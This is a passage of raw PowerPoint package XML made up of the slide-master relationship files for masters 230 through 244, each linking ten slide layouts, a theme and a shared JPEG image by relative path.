Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout230.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout221.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster230.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2299.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2298.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2297.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2296.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2295.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2294.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2293.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2292.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme230.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2300.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2291.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster231.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2309.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2308.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2307.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2306.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2305.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2304.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2303.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2302.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme231.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2310.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2301.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster232.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2319.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2318.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2317.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2316.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2315.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2314.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2313.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2312.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme232.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2320.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2311.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster233.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2329.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2328.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2327.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2326.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2325.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2324.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2323.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2322.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme233.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2330.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2321.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster234.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2339.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2338.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2337.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2336.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2335.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2334.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2333.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2332.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme234.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2340.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2331.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster235.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2349.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2348.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2347.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2346.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2345.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2344.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2343.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2342.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme235.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2350.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2341.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster236.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2359.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2358.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2357.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2356.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2355.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2354.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2353.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2352.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme236.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2360.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2351.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster237.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2369.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2368.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2367.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2366.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2365.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2364.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2363.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2362.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme237.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2370.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2361.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster238.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2379.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2378.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2377.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2376.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2375.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2374.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2373.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2372.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme238.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2380.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2371.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster239.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2389.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2388.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2387.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2386.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2385.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2384.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2383.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2382.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme239.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2390.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2381.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster24.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout239.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout238.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout237.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout236.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout235.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout234.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout233.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout232.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme24.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout240.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout231.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster240.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2399.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2398.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2397.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2396.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2395.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2394.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2393.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2392.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme240.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2400.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2391.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster241.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2409.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2408.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2407.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2406.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2405.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2404.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2403.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2402.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme241.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2410.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2401.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster242.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2419.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2418.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2417.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2416.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2415.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2414.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2413.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2412.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme242.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2420.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2411.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster243.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2429.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2428.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2427.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2426.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2425.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2424.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2423.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2422.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme243.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2430.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2421.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster244.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2439.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2438.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2437.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2436.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2435.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2434.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2433.xml"/><Relationship Id="rId2" 